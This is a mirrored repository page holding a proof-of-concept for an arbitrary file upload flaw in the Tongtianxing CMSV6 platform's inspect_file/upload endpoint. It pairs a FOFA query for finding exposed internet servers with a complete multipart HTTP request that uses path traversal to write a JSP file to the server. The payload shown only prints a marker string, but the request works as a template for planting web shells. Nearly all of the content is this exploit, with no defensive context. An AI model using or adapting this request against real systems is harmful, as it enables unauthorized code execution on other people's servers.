POC/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md at 0765598407cd9009d5e2b5e7bc4e8e6319c79949

admin/POC

Fork 0

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

748 B

Raw Blame History

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

fofa

body="./open/webApi.html"||body="/808gps/"

poc

POST /inspect_file/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 226
Content-Type: multipart/form-data; boundary=2e7688d712bcc913201f327059f9976b

--2e7688d712bcc913201f327059f9976b
Content-Disposition: form-data; name="uploadFile"; filename="../707140.jsp"
Content-Type: application/octet-stream

<% out.println("007319607"); %>
--2e7688d712bcc913201f327059f9976b--

748 B Raw Blame History

通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞

fofa

poc

748 B

Raw Blame History